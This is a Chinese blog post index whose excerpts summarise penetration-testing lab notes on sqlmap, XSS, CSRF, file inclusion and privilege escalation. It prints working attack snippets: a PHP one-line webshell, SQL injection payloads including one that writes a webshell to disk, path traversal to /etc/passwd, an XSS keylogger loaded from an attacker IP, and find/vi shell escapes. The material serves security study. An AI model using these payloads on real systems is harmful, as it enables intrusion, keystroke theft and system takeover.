自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(86)
  • 收藏
  • 关注

原创 简单抓取网页内容:Chrome插件Xpath-helper2.0.2安装及使用

安装:1.在Chrome浏览器输入:chrome://extensions/ 进入扩展程序安装界面。2.打开浏览器设置,选择扩展程序下载的下来的xpath-helper 是.crx格式的,如果直接拖拽过去无法安装可以先将.crx格式的文件先改成rar格式然后解压,再从浏览器上加载已解压的扩展程序即可成功安装。安装成功,浏览器右上角会有一个X的小图标。Xpth-helper启动:打开任意网页使用ctrl+shift+x 启动or关闭,或者直接点击右上角的小图标。那么接下来就可以愉快的开启爬虫之旅

2021-03-13 11:21:04 1865

原创 sqlmap注入修改useragent信息

修改sqlmap.conf文件agent = Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0加载配置文件并执行测试python sqlmap.py -c sqlmap.conf -u我尝试去修改源码但是新版本就够变了就算了,还是用conf文件来加载吧...

2021-02-25 17:47:20 973

原创 burpsuit截取https数据包

在使用burpsuit代理访问https的链接,会出现不受信任的链接提示,无法对https进行抓包。可以导入burpsuit自带ca证书解决一、导出证书二、导入浏览器中为可信任证书(我的是火狐)火狐浏览器还要编辑一下证书设置,不然还是会失败...

2021-02-05 16:11:16 317

原创 写入webshell的几种方式

测试:pikachu平台研究了几种写入webshell的方式一、上传漏洞写入包含前端限制绕过、图片马绕过等一些绕过方法详细见https://www.cnblogs.com/dogecheng/p/11640389.html二、sql注入写入前提是有root权限sql注入写入一句话木马可以根据本地包含报错查找路径C:\xampp\htdocs\pikachu\vul\fileinclude也可以根据union select 1,@@datadir查找mysql data路径C:\xam

2021-01-24 22:40:05 2139

原创 利用本地文件包含、目录遍历漏洞、页面漏洞泄露、不安全下载——进行信息收集

测试:pikachu平台本地文件包含http://192.168.171.133/pikachu/vul/fileinclude/fi_remote.php?filename=1.php&submit=提交先修改fikename的参数测试能否包含读取其他信息然后可以分别查看windows和linux的特定信息目录测试../../../../Windows/System32/drivers/etc/hosts../../../../../../../../etc/passwd乱输入一个

2021-01-24 22:28:30 342

原创 利用csrf执行非法参数进行越权操作

使用pikachu平台操作详细操作和说明见https://www.cnblogs.com/dogecheng/p/11583412.html大概思路分两种:1.GET中带有参数进行参数修改的尝试,然后去GET请求执行http://192.168.21.2/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=18656565545&add=uua&email=lili%40pikachu.com&su

2021-01-24 22:09:57 414

原创 xss-pikachu实验的总结

详见https://www.cnblogs.com/dogecheng/p/11556221.html

2021-01-23 14:00:00 262

原创 sql注入-针对pikachu的注入实验的总结

采取手动注入的方式:联合注入可以成功的情况1+union+select+1,database() pikachu 10.4.14-mysql1+union+select+1,(select+table_name+from+information_schema.tables+where+table_schema='pikachu'+limit+0,1)httpinfo1+union+select+1,(select+table_name+from+information_schema.table

2021-01-23 13:49:06 220

原创 nmap的使用收集

nmap -sS -p- 192.168.21.2 半开放扫描,Nmap发送SYN包到远程主机,一般半开放好一点,不容易被ban

2021-01-23 13:26:42 86

原创 rbash提权为bash

rbash绕过:可以使用vi的情况下vi 123然后使用:set shell=/bin/bash:shell最后 export PATH=$PATH:/bin/

2021-01-23 11:59:37 524

原创 利用find权限提权

1.如果find有权限先测试find / -type f -name getflag -exec “whoami” ;find / -type f -name getflag -exec “/bin/sh” ;

2021-01-23 11:58:48 1108

原创 内网渗透信息收集-windos

用户信息# 查看本机用户列表net user# 获取本地管理员信息net localgroup administrators# 查看当前在线用户quserquser userquser user || qwinsta# 查当前用户在目标系统中的具体权限whoami /all#查看当前权限whoami && whoami /priv#查看当前机器中所有的组名,了解不同组的职能,如IT、HR、ADMIN、FILEnet localgroup系统信息#

2021-01-23 11:57:57 116

原创 溯源调研手段

概述 21.1. Riskiq、VT 21.2. 微步在线 21.3. 匿名访问网站 21.4. GOOGLE 2概述碰到攻击IP,需要对其进行追踪溯源。不过红队使用的攻击IP多半是经过层层代理的,针对该IP进行溯源难度较大,具体操作需要根据现场情况判断。Riskiq、VTRiskiq链接:https://community.riskiq.com/homeVt链接:https://www.virustotal.com/gui/home/uploadCensys:https://cen.

2021-01-23 11:57:34 415

原创 windos cmd命令收集总结

查看本机mac地址 ipconifg/all

2021-01-23 11:51:19 194

原创 linux命令收集

查看防火墙策略 iptables -n -L加锁文件 chatter +i 文件 解锁文件 chatter -i 文件

2021-01-23 11:49:09 115

原创 kali渗透学习-SSL、TLS中间人攻击(SSLsplit,Mitmproxy,SSLstrip),拒绝服务攻击

SSL中间人攻击我在做实验的时候,在最后使用工具的时候都没有成功,被攻击电脑会无法正常访问了,怀疑和缺少依赖环境有关攻击者位于客户端和服务器通信链路中,可以先理解一下整个ssl加密流程利用方法:ARP地址欺骗修改DHCP服务器 (存在就近原则)手动修改网关修改DNS设置修改HOSTS文件【高于DNS】ICMP、STP、OSPF加密流量中间人攻击前提  【以下某一条符合则可】1、客户端已经信任伪造证书颁发机构(安装其根证书)2、攻击者控制了合法证书颁发机构(控制CA服

2021-01-23 11:48:15 950

原创 kali渗透学习-HTTPS攻击(Openssl、sslscan、sslyze、检查SSL的网站)

HTTPS的作用解决的是信息传输过程中数据被篡改、窃取  【从中注入恶意代码,多为链路劫持】涉及的加密:对称、非对称、单向HTTPS攻击方法降级攻击解密攻击(明文、证书伪造)协议漏洞(贵宾狗)、https实现方法的漏洞(参考心脏出血漏洞原理)、配置不严格SSL(Secure socket layer)保证网络通信安全的加密协议TLS它建立在SSL 3.0协议规范之上,是SSL 3.0的后续版本,可以理解为SSL 3.1  【为了兼容性问题,低版本的TLS还在使用】SSL与TLS的

2021-01-23 11:48:02 1347

原创 kali渗透学习-Web渗透WebShell(中国菜刀、WeBaCoo、Weevely)

Webshell本质:<?php echo shell_exec($_GET['cmd']);?>就是连接web执行一个shell终端,用一句话在浏览器中执行,不方便windows平台中国菜刀中国菜刀官网:胖客户端程序,国产中比较优秀的webshell,适用性较强  【但版本众多而乱,可能存在木马,据说的官网http://www.maicaidao.co/】1、利用上传漏洞,先上传一句话木马【支持三种服务器端PHP、ASP、ASP.NET】使用ssh连接metasploitabl

2021-01-23 11:47:48 794

原创 kali渗透学习-Web渗透CSRF

CSRF原理:经常与XSS混淆从信任的角度进行区分:XSS:利用用户对站点的信任;CSRF:利用站点对已经身份认证的信任(有一定的信任,实施的前提必须是用户登录了)【默认情况:站点不信任客户端】结合社工在身份认证会话过程中实现攻击场景:1、修改账号密码、个人信息(email、收货地址)2、发送伪造的业务请求(网银、购物、投票)3、关注他人社交账号、推送博文4、在用户非自愿、不知情情况下提交请求属于业务逻辑漏洞(所有请求都是正常的请求)造成的原因:对关键操作(支付、提交订单等)缺

2021-01-23 11:47:27 248

原创 kali渗透学习-Web渗透XSS(三)存储型XSS、DOM型XSS、神器BEFF

存储型XSS1、可长期存储于服务器端2、每次用户访问都会被执行js脚本,攻击者只需侦听指定端口#攻击利用方法大体等于反射型xss利用##多出现在留言板等位置*推荐使用burpsuitea、观察返回结果,是否原封不动地返回输入数据?是否有其他标签js代码通过留言板存储在服务器中,所以每次点击留言板链接,都会弹出xss弹窗注入后会永久在服务器端,每次访问都会下发该注入。用dvwa测试的时候消除注入需在设置中重置数据库b、测试加载攻击者控制的服务器中的js文件#启动apache2【默

2021-01-23 11:47:16 236

原创 kali渗透学习-Web渗透XSS(一)

XSSxss表示Cross Site Scripting(跨站脚本攻击),它与SQL注入攻击类似,SQL注入攻击中以SQL语句作为用户输入,从而达到查询/修改/删除数据的目的,而在xss攻击中,通过插入恶意脚本,实现对用户浏览器的控制。漏洞存在于服务器端,攻击对象为WEB客户端。【原理:为了使用户体验更好等因素,有部分代码会在浏览器中执行】【JavaScript详解】:与java语言无关;命名完全出于市场原因,是使用最广的客户端脚本语言使用场景:针对以下几个点位注入直接嵌入html:<scr

2021-01-23 11:46:50 553

原创 kali渗透学习-Web渗透XSS(二)漏洞利用-键盘记录器,xsser

原则上:只要XSS漏洞存在,可以编写任何功能的js脚本反射型漏洞利用键盘记录器:被记录下的数据会发送到攻击者指定的URL地址上服务器:kali    客户端启动apache2服务:service apache2 start语法:<script src="http://192.168.1.127/keylogger.js"></script>keylogger.js 键盘记录器 需要修改里面的接受地址document.onkeypress = function(ev

2021-01-23 11:46:24 444

原创 kali渗透学习-sqlmap自动注入(四)Enumeration,Brute force,UDF injection,File system,OS,Windows Registry,General类

Enumeration【数据枚举】–privileges -U username【CU 当前账号】-D dvwa -T users -C user --columns   【指定数据库,表,列】–exclude-sysdbs  【排除系统层的库】#查具体数据  【前提:当前数据库用户有权读取information_schema库】–schema --batch --exclude-sysdbs  元数据【–batch:批处理,使用默认选项,直接出结果】–count  【计数】Dump数据

2021-01-23 11:46:09 130

原创 kali渗透学习-sqlmap自动注入(三)Optimization,Injection,Detection,Techniques,Fingerprint类

Optimization【优化性能参数,可提高效率】-o:指定前三个参数(–predict-output、–keep-alive、–null-connection)–predict-output:根据检测方法,比岁返回值和统计表内容,不断缩小检测范围,提高检测效率可检测的返回值:版本名、用户名、密码、Privaleges、role、数据库名称、表名、列名与–threads参数不兼容统计表:/usr/share/sqlmap/txt/common-outputs.txt–keep-alive

2021-01-23 11:45:58 117

原创 kali渗透学习-sqlmap自动注入(二)Request类

Request可以利用谷歌查找此类回包网站#inurl:.php?id=1、 数据段:–dataGet/post都可以使用【POST方法】Sqlmap -u “http://1.1.1.1/a.php” --data=”user=1&pass=2” –f#sqlmap可自动识别“&”【GET方法】Sqlmap –u “http://1.1.1.1/a.php” –-data=”user=1&pass=2”2、 变量分隔符:–param-del#大部分we

2021-01-23 11:45:49 117

原创 kali渗透学习-sqlmap自动注入(一)sqlmap介绍和TARGET类

sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞【动态页面中get/post参数、cookie、HTTP头】。它由Python语言开发而成,因此运行需要安装python环境。但在kali中已经集成。其功能完善,有强大的引擎,适用几乎所有数据库,,可自动进行数据榨取,也可对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行操作系统命令),还可以做XSS漏洞检测【Windows SQLmap教程】注意:sqlmap只是用来检测和利用sql注入点的,并不能扫描出网站

2021-01-23 11:45:37 454 1

原创 metasploitable2在进行SQL注入时报错——Table ‘metasploit.accounts‘ doesn‘t exit

在使用metasploitable2进行SQL注入时,发现了如下的问题,Table 'metasploit.accounts' doesn't exit;首先进入数据库,查看库名;mysql -u root发现metasploit库是空的,这就是为什么前面会报错的原因;在数据库中,发现了一...

2021-01-23 11:45:25 144

原创 kali渗透学习-手动sql注入(三)猜测列名、表名、库名、字段内容,数据库写入,SQL盲注

当无权读取infomation_schema库【MySQL最重要的源数据库,必须有root权限】/拒绝union、order by语句,只有通过暴力猜测进一步的判断sql语句结构猜列名: ' and coclumn is null--+ (coclumn代表列名字,可以随便搞) 【并且列有一个字段为空,正常执行,若没有空字段,且该列存在,返回空白内容;若列不存在,则报错】(可确定语句可插入数据库运行)例如:’ and asd is null–+使用kali集成的字典文件爆破列名字对字典

2021-01-23 11:44:42 392

原创 kali渗透学习-手动sql注入(二)读取文件、写入文件、反弹shell

读取文件【使用load_file函数】’ union SELECT null,load_file(’/etc/passwd’)–(有一个空格)也可以使用burpsuite进行注入写入文件' union select null,"<?php passthru($_GET['cmd']); ?>" INTO DUMPFILE "/var/www/a.php" --+ 【写入一句话木马;INTO DUMPLING:MySQL函数,将输入下载在数据库中】此语句往往会提示无法写入,因

2021-01-23 11:44:29 419

原创 kali渗透学习-手动sql注入检测(一)

SQL注入原理:通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。##服务端程序将用户输入参数作为查询条件,直接拼接SQL语句,并将查询结果返回给客户端浏览器例如在用户登录判断SELECT * FROM users WHERE user=‘uname' AND password=‘pass‘SELECT * FROM users WHERE user=‘name' AND password='' OR ''='‘ 【OR:逻辑运算符,(p

2021-01-23 11:44:14 514

原创 kali渗透学习-web渗透手动漏洞挖掘(四)

文件上传漏洞【经典漏洞,本身为一个功能,根源:对上传文件的过滤机制不严谨】编写一句话,然后直接上传文件测试:<?php echo shell_exec($_GET['cmd']);?>直接上传webshell看是否上传成功进行一句话测试绕过过滤机制低安全级别代码没有过滤机制绕过:可截包重放,修改上传文件大小等限制中安全级别针对文件类型有过滤需要image/jpeg类型进行截断,重放修改文件类型绕过:截包,修改上传类型Content-Type,重放mimetyp

2021-01-23 11:44:04 201

原创 kali渗透学习-web渗透手动漏洞挖掘(三)

登陆后利用阶段1.进行手动爬网,自动扫描,进一步的探测a.过滤,只显示有参数的请求b.使用Repeater测试逐步删除无用变量,试出可影响页面内容的变量对符号型输入,先进行编码没对输入变量进行过滤例如dvwa中的Command Execution ping测试命令进行测试,是否有漏洞low级别:未进行任何过滤,可以用 ;、|、&、&&查看源码,查找原因,直接应用体检的变量没有过滤medium级别:设置了黑名单,可以使用 |、&绕过high级别

2021-01-23 11:43:42 395

原创 kali渗透学习-web渗透手动漏洞挖掘(二)

手动漏洞挖掘原则1.每一个变量都进行尝试2.所有头【如:cookie中的变量】3.逐个变量删除,然后发送测试查看页面的返回结果是不是有差别,有差别则是有影响的变量参数可以以进一步的测试利用突破身份认证1、常用弱口令/基于字典的密码爆破2、手工猜测,若无锁定机制,则进行爆破3、信息收集【分站上信息收集,猜测账号密码,如:用户光荣榜等。这是进一步的缩减密码破解范围,减少密码破解难度】手机号:对于隐藏部分的手机号,猜测其确切账号(手动输入,已知手机号,观察密码错误提示信息【如:用户名有误】,则爆破

2021-01-23 11:43:33 206

原创 kali渗透学习-web渗透手动漏洞挖掘(一)

流传linux操作系统比windows系统安全的说法,是因为windows系统默认安装后,会开放很多服务和无用的端口,而且未经过严格安全性的配置,经常有系统服务以最高权限运行。漏洞类型–phpMyadmin远程命令执行漏洞1、攻击原理和思路安装在web服务器中的web接口,专门用来管理MySQL数据库。对于早期版本,安装后若是没有做安全配置,对敏感路径进行删除,则有可能留下安全隐患,其中最明显的为setup。a.探索PHP网站(可根据banner等信息判断)的phpmyadmin目录是否可以访问(扫

2021-01-23 11:42:59 765

原创 kali渗透学习-web渗透简介和基础靶机环境搭建

web渗透早期Web渗透其实是攻击Web服务器,比如IIS或者是TomcatC/S架构时期:程序员很累,需要兼顾两方面的问题后来程序猿们觉得这种方式复杂,后来就有了B/S架构:只需要一个浏览器即可,而程序猿只需要遵循浏览器的规则进行编码即可服务器会根据用户使用浏览器提交的数据来存储或者返回对应的信息张三只够看到的页面和信息,李四未必就可以看到服务器端通常包括:Web服务器(Tomcat),应用程序服务器,数据库应用程序是什么?是可以交互的,我给它一个值,它会做出相应的反应因此,至少这里,就存在

2021-01-23 11:42:52 927

原创 kali渗透学习-web渗透Burpsuite扫描(扫描功能需要下载破解版测试)

123

2021-01-23 11:42:39 308

原创 kali渗透学习-web渗透OWASP_ZAP扫描

OWASP_ZAPOWASP_ZAP扫描器不同于之前介绍的Web扫描器:是一个更完善,集成更多功能的Web扫描器,开源免费跨平台OWASP_ZAP2.0是Kali自带的,不像之前介绍的Arachni,需要自己再下载准备调试打开后接受协议,第一次进入需要选择Session会话配置:推荐选择第二个选项,这样每一次进入就不会是一个全新的会话,而是会加载之前的找一个目录来保存OWASP_ZAP的会话信息:一旦启动了OWASP_ZAP,默认就会启动代理,这时候就需要到浏览器设置(截断代理):代理

2021-01-23 11:42:29 586

原创 kali渗透学习-后渗透利用阶段(配置不当提权和收集敏感信息,隐藏痕迹)

利用配置不当提权与漏洞提权相比 更常用的方法,企业环境补丁更新的全部已经安装,输入变量过滤之外更值得研发关注的安全隐患条件:查找以system权限启动,NTFS权限允许users修改删除windosicacls(2003之后的系统自带、vista、win7等)icacls c:\windows*.exe /save perm /Tbu普通用户权限查找特征FA;;;BUi586-mingw32msvc-gcc -o admin.exe admin.clinuxFindfind / -p

2021-01-23 11:41:13 138

原创 kali渗透学习-后渗透利用阶段(wce和漏洞利用)

wce工具理解传输身份验证使用ntlm协议的原理wce和Pwdump不同,前者是在内存中找到明文的安全包Digest Authentication Package提取用户明文密码,后者是在sam数据库中找到用户hashkali中工具路径/usr/share/wce/需要管理员权限(比较理想的情况,可以进一步但探测其他的账密码)wce-universal.exe -l :查看当前登录账号的密码的密文形式的哈希值,只能读到已经登录的账号,没有未登录的账号【lmhash:nthash】-lv:表示查

2021-01-23 11:40:53 400 1

原创 kali渗透学习-后渗透利用阶段(本地提权,抓包嗅探)

本地提权已实现本地低权限账号登录远程溢出直接获得账号密码希望获取更高权限实现对目标进一步控制系统账号之间权限隔离操作系统安全的基础用户空间内核空间系统账号用户账号登陆时获取权限令牌账号无需用户登陆已在后台启动服务Windows的用户权限user<Administrator<SystemLinux的用户权限User<Root获取Windows system权限的几种方法1、利用at命令直接会调用system【at /?】##只能在XP与2003的系统上使用

2021-01-23 11:40:28 479

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除